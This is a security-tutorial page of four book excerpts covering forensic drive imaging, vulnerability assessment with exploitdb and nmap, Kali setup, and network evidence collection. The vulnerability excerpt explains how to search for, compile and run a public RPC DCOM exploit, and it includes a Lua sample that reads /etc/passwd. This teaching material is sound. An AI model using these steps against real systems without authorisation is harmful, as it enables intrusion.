
How-To Tutorials - Security

174 Articles

Windows Drive Acquisition

Packt
21 Jul 2017
13 min read
In this article by Oleg Skulkin and Scar de Courcier, authors of Windows Forensics Cookbook, we will cover drive acquisition in E01 format with FTK Imager, drive acquisition in RAW format with DC3DD, and mounting forensic images with Arsenal Image Mounter. (For more resources related to this topic, see here.)

Before you can begin analysing evidence from a source, it first needs to be imaged. Imaging is a forensic process in which an exact copy of a drive is taken. This is an important step, especially if evidence needs to be taken to court, because forensic investigators must be able to demonstrate that they have not altered the evidence in any way.

The term forensic image can refer to either a physical or a logical image. A physical image is a precise replica of the entire drive, whereas a logical image is a copy of a certain volume within that drive. In general, logical images show what the machine's user will have seen and dealt with, whereas physical images give a more comprehensive, sector-level view of the drive.

A hash value is generated to verify the authenticity of the acquired image. Hash values are essentially cryptographic digital fingerprints which show whether a particular item is an exact copy of another. Altering even the smallest bit of data will generate a completely new hash value, thus demonstrating that the two items are not the same. When forensic investigators image a drive, they should generate a hash value for both the original drive and the acquired image; some pieces of forensic software will do this for you.

There are a number of tools available for imaging hard drives, some of which are free and open source. However, the most popular way for forensic analysts to image hard drives is to use one of the better-known forensic software vendors' solutions. This is because it is imperative to be able to explain how the image was acquired and to demonstrate its integrity, especially if you are working on a case that will be taken to court. Once you have your image, you will be able to analyse the digital evidence from a device without directly interfering with the device itself. In this article, we will look at various tools that can help you image a Windows drive and take you through the acquisition process.

Drive acquisition in E01 format with FTK Imager

FTK Imager is an imaging and data preview tool by AccessData which allows an examiner not only to create forensic images in different formats, including RAW, SMART, E01 and AFF, but also to preview data sources in a forensically sound manner. In the first recipe of this article, we will show you how to create a forensic image of a hard drive from a Windows system in E01 format. E01, or EnCase's Evidence File, is a standard format for forensic images in law enforcement. Such images consist of a header with case information, including acquisition date and time, the examiner's name, acquisition notes, and an optional password; a bit-by-bit copy of the acquired drive, made up of data blocks, each verified with its own CRC (Cyclic Redundancy Check); and a footer with an MD5 hash of the bitstream.
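Although FTK Imager computes and compares the hashes for you later in this recipe, the underlying check is easy to reproduce by hand. The following is a minimal sketch, not part of the original recipe, of verifying a RAW image against its source on a Linux forensic workstation; the device and file names are examples only.

sudo md5sum /dev/sdb      # hypothetical original evidence drive, attached through a write blocker
md5sum evidence.dd        # hypothetical acquired RAW image
sudo sha1sum /dev/sdb
sha1sum evidence.dd
# The digests must match pair for pair; a single altered byte produces a completely different hash.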
Getting ready

First of all, let's download FTK Imager from the AccessData website. To do so, go to the SOLUTIONS tab and then to Product Downloads. Choose DIGITAL FORENSICS, and then FTK Imager. At the time of this writing, the most up-to-date version is 3.4.3, so click the green DOWNLOAD PAGE button on the right. You should now be at the download page. Click on the DOWNLOAD NOW button and fill in the form; after this, you'll receive the download link at the email address you provided. The installation process is quite straightforward (all you need to do is click Next a few times), so we won't cover it in this recipe.

How to do it...

There are two ways of initiating the drive imaging process:

Use the Create Disk Image button from the toolbar, as shown in the following figure. (Create Disk Image button on the Toolbar)
Use the Create Disk Image option from the File menu, as shown in the following figure. (Create Disk Image... option in the File Menu)

You can choose whichever option you like. The first window you see is Select Source. Here you have five options:

Physical Drive: This allows you to choose a physical drive as the source, with all partitions and unallocated space.
Logical Drive: This allows you to choose a logical drive as the source, for example, the E: drive.
Image File: This allows you to choose an image file as the source, for example, if you need to convert your forensic image from one format to another.
Contents of a Folder: This allows you to choose a folder as the source; of course, no deleted files and so on will be included.
Fernico Device: This allows you to restore images from multiple CDs/DVDs.

Of course, we want to image the whole drive to be able to work with deleted data and unallocated space, so let's choose the Physical Drive option. The evidence source mustn't be altered in any way, so make sure you are using a hardware write blocker; you can use one from Tableau, for example. These devices allow acquisition of drive contents without creating the possibility of modifying the data. (FTK Imager Select Source window)

Click Next and you'll see the next window, Select Drive. Choose the source drive from the drop-down menu; in our case it's \\.\PHYSICALDRIVE2. (FTK Imager Select Drive window)

Once the source drive is chosen, click Finish. The next window is Create Image. We'll get back to this window soon, but for now, just click Add...

It's time to choose the destination image type. As we decided to create our image in EnCase's Evidence File format, let's choose E01. (FTK Imager Select Image Type window)

Click Next and you'll see the Evidence Item Information window. Here we have five fields to fill in: Case Number, Evidence Number, Unique Description, Examiner and Notes. All fields are optional. (FTK Imager Evidence Item Information window)

Whether you filled in the fields or not, click Next. Now choose the image destination; you can use the Browse button for this. You should also fill in the image filename. If you want your forensic image to be split, choose a fragment size (in megabytes). The E01 format supports compression, so if you want to reduce the image size, you can use this feature; as you can see in the following figure, we have chosen 6. And if you want the data in the image to be secured, use the AD Encryption feature. AD Encryption is whole-image encryption, so not only is the raw data encrypted, but also any metadata. Each segment or file of the image is encrypted with a randomly generated image key using AES-256. (FTK Imager Select Image Destination window)

We are almost done. Click Finish and you'll see the Create Image window again. Now, look at the three options at the bottom of the window. The verification process is very important, so make sure the Verify images after they are created option is ticked; it helps you confirm that the source and the image are identical. The Precalculate Progress Statistics option is also very useful: it will show you the estimated time remaining during the imaging process.
The last option will create directory listings of all files in the image for you, but of course it takes time, so use it only if you need it. (FTK Imager Create Image window)

All you need to do now is click Start, and the imaging process begins. When the image is created, the verification process starts. Finally, you'll get the Drive/Image Verify Results window, like the one in the following figure. (FTK Imager Drive/Image Verify Results window) As you can see, in our case the source and the image are identical: both hashes matched. In the folder with the image, you will also find an info file with valuable information such as the drive model, serial number, source data size, sector count, MD5 and SHA1 checksums, and so on.

How it works...

FTK Imager uses the physical drive of your choice as the source and creates a bit-by-bit image of it in EnCase's Evidence File format. During the verification process, the MD5 and SHA1 hashes of the image and the source are compared.

See also

FTK Imager download page: http://accessdata.com/product-download/digital-forensics/ftk-imager-version-3.4.3
FTK Imager User Guide: https://ad-pdf.s3.amazonaws.com/Imager/3_4_3/FTKImager_UG.pdf

Drive acquisition in RAW format with DC3DD

DC3DD is a patched (by Jesse Kornblum) version of the classic GNU dd utility with added computer forensics features: for example, on-the-fly hashing with a number of algorithms (MD5, SHA-1, SHA-256, and SHA-512), progress reporting during the acquisition process, and so on.

Getting ready

You can find a compiled, standalone 64-bit version of DC3DD for Windows at SourceForge. Just download the ZIP or 7z archive, unpack it, and you are ready to go.

How to do it...

Open the Windows Command Prompt, change directory (you can use the cd command) to the one containing dc3dd.exe, and type the following command:

dc3dd.exe if=\\.\PHYSICALDRIVE2 of=X:\147-2017.dd hash=sha256 log=X:\147-2017.log

Press Enter and the acquisition process will start. Of course, your command will be a bit different, so let's look at what each part of it means:

if: This stands for input file. DD is originally a Linux utility, where everything is a file; in our command we point it at physical drive 2 (the drive we wanted to image, but in your case it may be a different number, depending on how many drives are connected to your workstation).
of: This stands for output file. Here you type the destination of your image, in RAW format; in our case it's the X: drive and the file 147-2017.dd.
hash: As already mentioned, DC3DD supports four hashing algorithms: MD5, SHA-1, SHA-256, and SHA-512. We chose SHA-256, but you can choose another.
log: Here you type the destination for the log; after the acquisition is complete, this file will contain the image version, the image hash, and so on.

How it works...

DC3DD creates a bit-by-bit image of the source drive in RAW format, so the size of the image will be the same as that of the source, and it calculates the image hash using the algorithm of the examiner's choice, in our case SHA-256.
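DC3DD records the computed hash in the log file; it can be reassuring to recompute it independently and compare. A minimal sketch follows, assuming a Windows workstation and the hypothetical file name used above (certutil ships with Windows):

certutil -hashfile X:\147-2017.dd SHA256

Compare the printed digest with the SHA-256 value recorded in 147-2017.log; they should be identical.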
See also

DC3DD download page: https://sourceforge.net/projects/dc3dd/files/dc3dd/7.2%20-%20Windows/

Mounting forensic images with Arsenal Image Mounter

Arsenal Image Mounter is an open source tool developed by Arsenal Recon. It can help a digital forensic examiner mount a forensic image or virtual machine disk in Windows. It supports both E01 (and Ex01) and RAW forensic images, so you can use it with any of the images we created in the previous recipes. It is important to note that Arsenal Image Mounter mounts the contents of disk images as complete disks. The tool supports all the file systems you can find on Windows drives: NTFS, ReFS, FAT32 and exFAT. It also has temporary write support for images, which is a very useful feature, for example, if you want to boot a system from the image you are examining.

Getting ready

Go to the Arsenal Image Mounter page on the Arsenal Recon website and click the Download button to download the ZIP archive. At the time of this writing, the latest version of the tool is 2.0.010, so in our case the archive is named Arsenal_Image_Mounter_v2.0.010.0_x64.zip. Extract it to a location of your choice and you are ready to go; no installation is needed.

How to do it...

There are two ways to choose an image for mounting in Arsenal Image Mounter:

Use the File menu and choose Mount image.
Use the Mount image button, as shown in the following figure. (Arsenal Image Mounter main window)

When you choose the Mount image option from the File menu or click the Mount image button, an Open window will pop up; here you should choose an image for mounting. The next window you will see is Mount options, like the one in the following figure. (Arsenal Image Mounter Mount options window) As you can see, there are a few options here:

Read only: If you choose this option, the image is mounted in read-only mode, so no write operations are allowed. (Do you still remember that you mustn't alter the evidence in any way? Of course, this is already an image, not the original drive, but nevertheless.)
Fake disk signatures: If an all-zero disk signature is found on the image, Arsenal Image Mounter reports a random disk signature to Windows so that it is mounted properly.
Write temporary: If you choose this option, the image is mounted in read-write mode, but all modifications are written not to the original image file but to a temporary differential file.
Write original: Again, this option mounts the image in read-write mode, but this time the original image file will be modified.
Sector size: This option allows you to choose the sector size.
Create "removable" disk device: This option emulates the attachment of a USB thumb drive.

Choose the options you think you need and click OK. We decided to mount our image as read only. You can now see a hard drive icon in the main window of the tool: the image is mounted. If you mounted only one image and want to unmount it, select the image and click the Remove selected button. If you have several mounted images and want to unmount all of them, click the Remove all button.

How it works...

Arsenal Image Mounter mounts forensic images or virtual machine disks as complete disks in read-only or read-write mode. A digital forensics examiner can then access their contents even with Windows Explorer.

See also

Arsenal Image Mounter page on the Arsenal Recon website: https://arsenalrecon.com/apps/image-mounter/

Summary

In this article, the authors explained the process and importance of drive acquisition using imaging tools such as FTK Imager and DC3DD, as well as image mounting with Arsenal Image Mounter. Drive acquisition, being the first step in the analysis of digital evidence, needs to be carried out with the utmost care, which in turn makes the analysis process smooth.
Resources for Article: Further resources on this subject: Forensics Recovery [article] Digital and Mobile Forensics [article] Mobile Forensics and Its Challenges [article]


Vulnerability Assessment

Packt
21 Jul 2017
11 min read
"Finding a risk is learning, Ability to identify risk exposure is a skill and exploiting it is merely a choice" In this article by Vijay Kumar Velu, the author of the book Mastering Kali Linux for Advanced Penetration Testing - Second Edition, we will learn about vulnerability assessment. The goal of passive and active reconnaissance is to identify the exploitable target and vulnerability assessment is to find the security flaws that are most likely to support the tester's or attacker's objective (denial of service, theft, or modification of data). The vulnerability assessment during the exploit phase of the kill chain focuses on creating the access to achieve the objective—mapping of the vulnerabilities to line up the exploits to maintain the persistent access to the target. Thousands of exploitable vulnerabilities have been identified, and most are associated with at least one proof-of-concept code or technique to allow the system to be compromised. Nevertheless, the underlying principles that govern success are the same across networks, operating systems, and applications. In this article, you will learn: Using online and local vulnerability resources Vulnerability scanning with nmap Vulnerability nomenclature Vulnerability scanning employs automated processes and applications to identify vulnerabilities in a network, system, operating system, or application that may be exploitable. When performed correctly, a vulnerability scan delivers an inventory of devices (both authorized and rogue devices); known vulnerabilities that have been actively scanned for, and usually a confirmation of how compliant the devices are with various policies and regulations. Unfortunately, vulnerability scans are loud—they deliver multiple packets that are easily detected by most network controls and make stealth almost impossible to achieve. They also suffer from the following additional limitations: For the most part, vulnerability scanners are signature based—they can only detect known vulnerabilities, and only if there is an existing recognition signature that the scanner can apply to the target. To a penetration tester, the most effective scanners are open source and they allow the tester to rapidly modify code to detect new vulnerabilities. Scanners produce large volumes of output, frequently containing false-positive results that can lead a tester astray; in particular, networks with different operating systems can produce false-positives with a rate as high as 70 percent. Scanners may have a negative impact on the network—they can create network latency or cause the failure of some devices (refer to the Network Scanning Watch List at www.digininja.org, for devices known to fail as a result of vulnerability testing). In certain jurisdictions, scanning is considered as hacking, and may constitute an illegal act. There are multiple commercial and open source products that perform vulnerability scans. Local and online vulnerability databases Together, passive and active reconnaissance identifies the attack surface of the target, that is, the total number of points that can be assessed for vulnerabilities. A server with just an operating system installed can only be exploited if there are vulnerabilities in that particular operating system; however, the number of potential vulnerabilities increases with each application that is installed. Penetration testers and attackers must find the particular exploits that will compromise known and suspected vulnerabilities. 
The first place to start the search is at vendor sites; most hardware and application vendors release information about vulnerabilities when they release patches and upgrades. If an exploit for a particular weakness is known, most vendors will highlight this to their customers. Although their intent is to allow customers to test for the presence of the vulnerability themselves, attackers and penetration testers will take advantage of this information as well.

Other online sites that collect, analyze, and share information about vulnerabilities are as follows:

The National Vulnerability Database, which consolidates all public vulnerability data released by the US Government, available at http://web.nvd.nist.gov/view/vuln/search
Secunia, available at http://secunia.com/community/
The Open Source Vulnerability Database Project (OSVDB), available at http://www.osvdb.org/search/advsearch
Packetstorm Security, available at http://packetstormsecurity.com/
SecurityFocus, available at http://www.securityfocus.com/vulnerabilities
Inj3ct0r, available at http://1337day.com/
The Exploit Database maintained by Offensive Security, available at http://www.db-exploit.com

The Exploit Database is also copied locally to Kali, and it can be found in the /usr/share/exploitdb directory. Before using it, make sure that it has been updated using the following commands:

cd /usr/share/exploitdb
wget http://www.exploit-db.com/archive.tar.bz2
tar -xvjf archive.tar.bz2
rm archive.tar.bz2

To search the local copy of exploitdb, open a Terminal window and enter searchsploit and the desired search term(s) at the command prompt. This invokes a script that searches a database file (.csv) containing a list of all exploits. The search returns a description of known vulnerabilities as well as the path to a relevant exploit. The exploit can be extracted, compiled, and run against specific vulnerabilities. Take a look at the following screenshot, which shows the description of the vulnerabilities:

The search script scans each line in the CSV file from left to right, so the order of the search terms is important: a search for Oracle 10g will return several exploits, but 10g Oracle will not return any. Also, the script is case sensitive in unexpected ways; although you are instructed to use lowercase characters in the search term, different capitalizations of the same term can return a different number of hits (in the original example, variations of the term "bulletproof FTP" returned either seven hits or none). More effective searches of the CSV file can be conducted using the grep command or a search tool such as KWrite (apt-get install kwrite).
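As a hedged illustration of the two search approaches just described (the search terms are examples, and the exact CSV file name and path can differ between exploitdb versions):

searchsploit oracle 10g
grep -i "bulletproof ftp" /usr/share/exploitdb/files.csv    # case-insensitive search of the CSV index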
A search of the local database may identify several possible exploits with a description and a path listing; however, these will have to be customized to your environment and then compiled prior to use. Copy the exploit to the /tmp directory (the given path does not take into account that the /windows/remote directory resides in the /platforms directory). Exploits presented as scripts, such as Perl, Ruby, and PHP, are relatively easy to implement. For example, if the target is a Microsoft IIS 6.0 server that may be vulnerable to a WebDAV remote authentication bypass, copy the exploit to the root directory and then execute it as a standard Perl script, as shown in the following screenshot:

Many of the exploits are available as source code that must be compiled before use. For example, a search for RPC-specific vulnerabilities identifies several possible exploits. An excerpt is shown in the following screenshot:

The RPC DCOM vulnerability identified as 76.c is known from practice to be relatively stable, so we will use it as an example. To compile this exploit, copy it from the storage directory to the /tmp directory. In that location, compile it using GCC with the following command:

root@kali:~# gcc 76.c -o 76.exe

This uses the GNU Compiler Collection to compile 76.c to a file with the output (-o) name of 76.exe, as shown in the following screenshot. When you invoke the application against the target, you call the executable (now stored in the /tmp directory where it was compiled) using the ./ prefix, as follows:

root@kali:~# ./76.exe

The source code for this exploit is well documented, and the required parameters are made clear at execution, as shown in the following screenshot:

Unfortunately, not all exploits from the Exploit Database and other public sources compile as readily as 76.c. There are several issues that make the use of such exploits problematic, even dangerous, for penetration testers, listed as follows:

Deliberate errors or incomplete source code are commonly encountered, as experienced developers attempt to keep exploits away from inexperienced users, especially beginners who are trying to compromise systems without knowing the risks that go with their actions.
Exploits are not always sufficiently documented; after all, there is no standard that governs the creation and use of code intended to compromise a data system. As a result, they can be difficult to use, particularly for testers who lack expertise in application development.
Inconsistent behavior due to changing environments (new patches applied to the target system and language variations in the target application) may require significant alterations to the source code; again, this may require a skilled developer.
There is always the risk that freely available code contains malicious functionality. A penetration tester may think that they are conducting a proof of concept (POC) exercise and be unaware that the exploit has also created a backdoor in the application being tested that could be used by the developer.

To ensure consistent results and create a community of coders who follow consistent practices, several exploit frameworks have been developed. The most popular exploitation framework is the Metasploit framework.

Vulnerability scanning with nmap

There are no security operating distributions without nmap. So far, we have discussed how to utilize nmap during active reconnaissance, but attackers don't just use nmap to find open ports and services; they also use nmap to perform vulnerability assessment. As of 10 March 2017, the latest version of nmap is 7.40, and it ships with 500+ NSE (Nmap Scripting Engine) scripts, as shown in the following screenshot:

Penetration testers utilize nmap's most powerful and flexible features, which allow them to write their own scripts and also automate them to ease exploitation. Primarily, the NSE was developed for the following reasons:

Network discovery: The primary purpose for which attackers utilize nmap is network discovery.
Classier version detection of a service: There are thousands of services, with multiple version details for the same service, and NSE makes version detection more sophisticated.
Vulnerability detection: To automatically identify vulnerabilities in a vast network range; however, nmap itself cannot be a full vulnerability scanner in itself.
Backdoor detection: Some of the scripts are written to identify patterns that indicate worm infections on the network; this makes the attacker's job easier by narrowing the focus to taking over the machine remotely.
Vulnerability exploitation: Attackers can also potentially utilize nmap to perform exploitation in combination with other tools such as Metasploit, or write a custom reverse shell and combine it with nmap's exploitation capability.

Before running nmap to perform the vulnerability scan, penetration testers must update the nmap script database to see whether any new scripts have been added, so that they don't miss vulnerability identification:

nmap --script-updatedb

Use the following to run all the scripts against the target host:

nmap -T4 -A -sV -v3 -d -oA Targetoutput --script all --script-args vulns.showall target.com

Introduction to LUA scripting

Lua is a lightweight, embeddable scripting language built on top of the C programming language; it was created in Brazil in 1993 and is still actively developed. It is a powerful and fast programming language mostly used in gaming applications and image processing. The complete source code, manual, plus binaries for some platforms do not exceed 1.44 MB (less than a floppy disk). Some of the security tools developed with Lua support are nmap, Wireshark, and Snort 3.0. One of the reasons why Lua was chosen as the scripting language in information security is its compactness, its freedom from buffer overflow and format string vulnerabilities, and the fact that it can be interpreted. Lua can be installed directly on Kali Linux by issuing the apt-get install lua5.1 command in the Terminal. The following code extract is a sample script that reads a file and prints its first line:

#!/usr/bin/lua
local file = io.open("/etc/passwd", "r")
contents = file:read()
file:close()
print (contents)

Lua is similar to other scripting languages such as Bash and Perl. The preceding script should produce the output shown in the following screenshot:

Customizing NSE scripts

To achieve maximum effectiveness, customization of scripts helps penetration testers find the right vulnerabilities within the given span of time (attackers, on the other hand, do not have a time limit). The following code extract is a Lua NSE script to identify a specific file location, which we will search for across the entire subnet using nmap:

local http = require 'http'
description = [[
This is my custom discovery on the network
]]
categories = {"safe","discovery"}

function portrule(host, port)
  return port.number == 80
end

function action(host, port)
  local response
  response = http.get(host, port, "/test.txt")
  if response.status and response.status ~= 404 then
    return "successful"
  end
end

Save the file in the /usr/share/nmap/scripts/ folder. Your script is now ready to be tested, as shown in the following screenshot; you should be able to run your own NSE script without any problems. To fully understand the preceding NSE script, here is a description of what is in the code:

local http: require 'http' loads the HTTP library from Lua and makes it available through a local variable.
description: Where testers/researchers can enter a description of the script.
categories: This typically has two variables, one of which declares whether the script is safe or intrusive.
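Once the script is saved under /usr/share/nmap/scripts/, it can be invoked by path or name. A hedged example follows; the script file name and target range are hypothetical:

nmap -p80 --script /usr/share/nmap/scripts/mycustomdiscovery.nse 192.168.1.0/24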


Planning and Preparation

Packt
05 Jul 2017
9 min read
In this article by Jason Beltrame, author of the book Penetration Testing Bootcamp, we will see that proper planning and preparation is key to a successful penetration test. It is definitely not as exciting as some of the tasks we will do within the penetration test later, but it lays the foundation of the penetration test. There are a lot of moving parts to a penetration test, and you need to make sure that you stay on the correct path and know just how far you can and should go. The last thing you want to do in a penetration test is cause a customer outage because you took down their application server with an exploit test (unless, of course, they want us to get to that depth) or scanned the wrong network. Performing any of these actions would make our penetration-testing career a rather short-lived one.

In this article, the following topics will be covered:

Why does penetration testing take place?
Building the systems for the penetration test
Penetration system software setup

(For more resources related to this topic, see here.)

Why does penetration testing take place?

There are many reasons why penetration tests happen. Sometimes, a company may want to have a stronger understanding of their security footprint. Sometimes, they may have a compliance requirement that they have to meet. Either way, understanding why penetration testing is happening will help you understand the goal of the company. Plus, it will also let you know whether you are performing an internal penetration test or an external penetration test. External penetration tests follow the flow of an external user and see what they have access to and what they can do with that access. Internal penetration tests are designed to test internal systems, so typically the penetration box will have full access to that environment, being able to test all software and systems for known vulnerabilities. Since these tests have different objectives, we need to treat them differently; therefore, our tools and methodologies will be different.

Understanding the engagement

One of the first tasks you need to complete prior to starting a penetration test is to have a meeting with the stakeholders and discuss the various data points concerning the upcoming penetration test. This meeting could involve you as an external entity performing a penetration test for a client, or you as an internal security employee doing the test for your own company. The important element here is that the meeting should happen either way, and the same type of information needs to be discussed. During the scoping meeting, the goal is to discuss the various items of the penetration test so that you have not only everything you need, but also full management buy-in with clearly defined objectives and deliverables. Full management buy-in is a key component of a successful penetration test. Without it, you may have trouble getting required information from certain teams, or run into scope creep or general pushback.

Building the systems for the penetration test

With a clear understanding of expectations, deliverables, and scope, it is now time to start getting our penetration systems ready to go. For the hardware, I will be utilizing a decently powered laptop. The laptop specifications are a MacBook Pro with 16 GB of RAM, a 256 GB SSD, and a quad-core 2.3 GHz Intel i7, running VMware Fusion. I will also be using the Raspberry Pi 3. The Raspberry Pi 3 is a 1.2 GHz ARMv8 64-bit quad core, with 1 GB of RAM and a 32 GB microSD card.
Obviously, there is quite a power discrepancy between the laptop and the Raspberry Pi. That is okay, though, because I will be using these devices differently. Any task that requires serious processing power will be done on the laptop. I love using the Raspberry Pi because of its small form factor and flexibility. It can be placed in just about any location we need, and, if needed, it can be easily concealed.

For software, I will be using Kali Linux as my operating system of choice. Kali is a security-oriented Linux distribution that comes with a collection of security tools already installed. Its predecessor, BackTrack, was also a very popular security operating system. One of the benefits of Kali Linux is that it is also available for the Raspberry Pi, which is perfect in our circumstance. This way, we can have a consistent platform between the devices we plan to use in our penetration-testing labs. Kali Linux can be downloaded from their site at https://www.kali.org. For the Raspberry Pi, the Kali images are managed by Offensive Security at https://www.offensive-security.com. Even though I am using Kali Linux as my software platform of choice, feel free to use whichever software platform you feel most comfortable with. We will be using a number of open source tools for testing, and a lot of these tools are available for other distributions and operating systems.

Penetration system software setup

Setting up Kali Linux on the two systems is a bit different since they are different platforms. We won't be diving into a lot of detail on the install, but we will hit all the major points. This is the process you can use to get the software up and running. We will start with the installation on the Raspberry Pi:

Download the image from Offensive Security at https://www.offensive-security.com/kali-linux-arm-images/.
Open the Terminal app on OS X.
Using the xz utility, decompress the Kali image that was downloaded:
xz -d kali-2.1.2-rpi2.img.xz
Next, insert the USB microSD card reader with the microSD card into the laptop and list the disks that are installed so that you know the correct disk to put the Kali image on:
diskutil list
Once you know the correct disk, unmount it to prepare for writing:
diskutil unmountDisk /dev/disk2
Now that you have the correct disk unmounted, write the image to it using the dd command. This process can take some time, so if you want to check on the progress, you can press Ctrl + T at any time:
sudo dd if=kali-2.1.2-rpi2.img of=/dev/disk2 bs=1m
Since the image is now written to the microSD card, eject it with the following command:
diskutil eject /dev/disk2
Remove the USB microSD card reader, place the microSD card in the Raspberry Pi, and boot it up for the first time. The default login credentials are as follows:
Username: root
Password: toor
Change the default password on the Raspberry Pi to make sure no one else can get into it, using the following command:
passwd <INSERT PASSWORD HERE>
Making sure the software is up to date is important for any system, especially a secure penetration-testing system. You can accomplish this with the following commands:
apt-get update
apt-get upgrade
apt-get dist-upgrade
After a reboot, you are ready to go on the Raspberry Pi.
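One step the walkthrough above does not call out, but which is worth doing before writing the image, is verifying the download against the checksum published on the download page. A minimal sketch on OS X, using the file name from the steps above (the expected value must be taken from the Offensive Security site):

shasum -a 256 kali-2.1.2-rpi2.img.xz
# compare the printed value with the SHA256 sum listed next to the image on the download page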
Next, it's on to setting up the Kali Linux install on the Mac. Since you will be installing Kali as a VM within Fusion, the process varies compared to another hypervisor or a bare-metal install. For me, I like having the flexibility of keeping OS X running so that I can run commands there as well:

Similar to the Raspberry Pi setup, you need to download the image. You will do that directly via the Kali website; they offer virtual images for download as well. If you go to select these, you will be redirected to the Offensive Security site at https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/.
Now that you have the Kali Linux image downloaded, you need to extract the VMDK. We used 7z via the CLI to accomplish this task.
Since the VMDK is now ready to import, go into VMware Fusion and navigate to File | New. A screen similar to the following should be displayed:
Click on Create a custom virtual machine. You can select the OS as Other | Other and click on Continue.
Now, you will need to import the previously decompressed VMDK. Click on the Use an existing virtual disk radio button, and hit Choose virtual disk. Browse to the VMDK. Click on Continue. Then, on the last screen, click on the Finish button. The disk should now start to copy; give it a few minutes to complete.
Once completed, the Kali VM will boot. Log in with the credentials we used in the Raspberry Pi image:
Username: root
Password: toor
You then need to change the default password that was set, to make sure no one else can get into it. Open up a terminal within the Kali Linux VM and use the following command:
passwd <INSERT PASSWORD HERE>
Make sure the software is up to date, as you did for the Raspberry Pi. To accomplish this, you can use the following commands:
apt-get update
apt-get upgrade
apt-get dist-upgrade
Once this is complete, the laptop VM is ready to go.

Summary

Now that we have reached the end of this article, we should have everything that we need for the penetration test. Having had the scoping meeting with all the stakeholders, we were able to get answers to all the questions that we required. Once we completed the planning portion, we moved on to the preparation phase. In this case, the preparation phase involved setting up Kali Linux on the Raspberry Pi as well as setting it up as a VM on the laptop. We went through the steps of installing and updating the software on each platform, as well as some basic administrative tasks.

Resources for Article: Further resources on this subject: Introducing Penetration Testing [article] Web app penetration testing in Kali [article] BackTrack 4: Security with Penetration Testing Methodology [article]


Network Evidence Collection

Packt
05 Jul 2017
16 min read
In this article by Gerard Johansen, author of the book Digital Forensics and Incident Response, we will see that the traditional focus of digital forensics has been to locate evidence on the host hard drive. Law enforcement officers interested in criminal activity such as fraud or child exploitation can find the vast majority of evidence required for prosecution on a single hard drive. In the realm of incident response, though, it is critical that the focus goes far beyond a suspected compromised system. There is a wealth of information to be obtained at points along the flow of traffic from a compromised host to an external Command and Control server, for example. (For more resources related to this topic, see here.)

This article focuses on the preparation, identification, and collection of evidence that is commonly found among network devices and along the traffic routes within an internal network. This collection is critical during an incident where an external threat source is in the process of commanding internal systems or pilfering data out of the network. Network-based evidence is also useful when examining host evidence, as it provides a second source of event corroboration, which is extremely useful in determining the root cause of an incident.

Preparation

The ability to acquire network-based evidence is largely dependent on the preparations that are undertaken by an organization prior to an incident. Without some critical components of a proper infrastructure security program, key pieces of evidence will not be available to incident responders in a timely manner, and evidence may be lost as the CSIRT members hunt down critical pieces of information. In terms of preparation, organizations can aid the CSIRT by having proper network documentation, up-to-date configurations of network devices, and a central log management solution in place.

Aside from the technical preparation for network evidence collection, CSIRT personnel need to be aware of any legal or regulatory issues with regard to collecting network evidence. CSIRT personnel need to be aware that capturing network traffic can be considered an invasion of privacy absent any other policy. Therefore, the legal representative of the CSIRT should ensure that all employees of the organization understand that their use of the information system can be monitored. This should be expressly stated in policies prior to any evidence collection that may take place.

Network diagram

To identify potential sources of evidence, incident responders need to have a solid understanding of what the internal network infrastructure looks like. One method that can be employed by organizations is to create and maintain an up-to-date network diagram. This diagram should be detailed enough that incident responders can identify individual network components such as switches, routers, or wireless access points. It should also contain internal IP addresses so that incident responders can immediately access those systems through remote methods. For instance, examine the following simple network diagram:

This diagram allows for quick identification of potential evidence sources. Suppose, for example, that the laptop connected to the switch at 192.168.2.1 is identified as communicating with a known malware Command and Control server.
A CSIRT analyst could examine the network diagram and ascertain that the C2 traffic would have to traverse several network hardware components on its way out of the internal network. For example, there would be traffic traversing the switch at 192.168.10.1, through the firewall at 192.168.0.1, and finally through the router out to the Internet.

Configuration

Determining whether an attacker has made modifications to a network device such as a switch or a router is made easier if the CSIRT has a standard configuration immediately available. Organizations should already have configurations for network devices stored for disaster recovery purposes, but they should also be available to CSIRT members in the event of an incident.

Logs and log management

The lifeblood of a good incident investigation is evidence from a wide range of sources. Even something like a malware infection on a host system requires corroboration among a variety of sources. One common challenge with incident response, especially in smaller networks, is how the organization handles log management. For a comprehensive investigation, incident response analysts need access to as much network data as possible. All too often, organizations do not dedicate the proper resources to enabling comprehensive logging from network devices and other systems.

Prior to any incident, it is critical to clearly define how and what an organization will log, as well as how it will maintain those logs. This should be established within a log management policy and an associated procedure. CSIRT personnel should be involved in any discussion of which logs are necessary, as they will often have insight into the value of one log source over another. NIST has published a short guide to log management, available at: http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-92.pdf.

Aside from the technical issues regarding log management, there are legal issues that must be addressed. The following are some issues that should be addressed by the CSIRT and its legal support prior to any incident:

Establish logging as a normal business practice: Depending on the type of business and the jurisdiction, users may have a reasonable expectation of privacy absent any expressly stated monitoring policy. In addition, if logs are enabled strictly to determine a user's potential malicious activity, there may be legal issues. As a result, the logging policy should establish that logging of network activity is part of normal business activity and that users do not have a reasonable expectation of privacy.
Log as close to the event as possible: This is not so much an issue with automated logging, as entries are often created almost as the event occurs. From an evidentiary standpoint, logs that are not created close to the event lose their value as evidence in a courtroom.
Knowledgeable personnel: The value of logs is often dependent on who created the entry and whether or not they were knowledgeable about the event. In the case of logs from network devices, the logging software addresses this issue. As long as the software can be demonstrated to be functioning properly, there should be no issue.
Comprehensive logging: Enterprise logging should be configured for as much of the enterprise as possible. In addition, logging should be consistent. A pattern of logging that is random will have less value in a court than a consistent pattern of logging across the entire enterprise.
Qualified custodian: The logging policy should name a data custodian.
This individual would speak to the logging and the types of software utilized to create the logs. They would also be responsible for testifying to the accuracy of the logs and the logging software used.
Document failures: Prolonged failures, or a history of failures, in the logging of events may diminish their value in a courtroom. It is imperative that any logging failure be documented and a reason associated with such failure.
Log file discovery: Organizations should be aware that logs utilized within a courtroom proceeding will be made available to opposing legal counsel.
Logs from compromised systems: Logs that originate from a known compromised system are suspect. In the event that these logs are to be introduced as evidence, the custodian or incident responder will often have to testify at length concerning the veracity of the data contained within them.
Original copies are preferred: Log files can be copied from the log source to media. As a further step, any logs should be archived off the system as well. Incident responders should establish a chain of custody for each log file used throughout the incident, and these logs should be maintained as part of the case until an order from the court is obtained allowing their destruction.

Network device evidence

There are a number of log sources that can provide CSIRT personnel and incident responders with good information, and a range of manufacturers provides each of these network devices. As a preparation task, CSIRT personnel should become familiar with how to access these devices and obtain the necessary evidence:

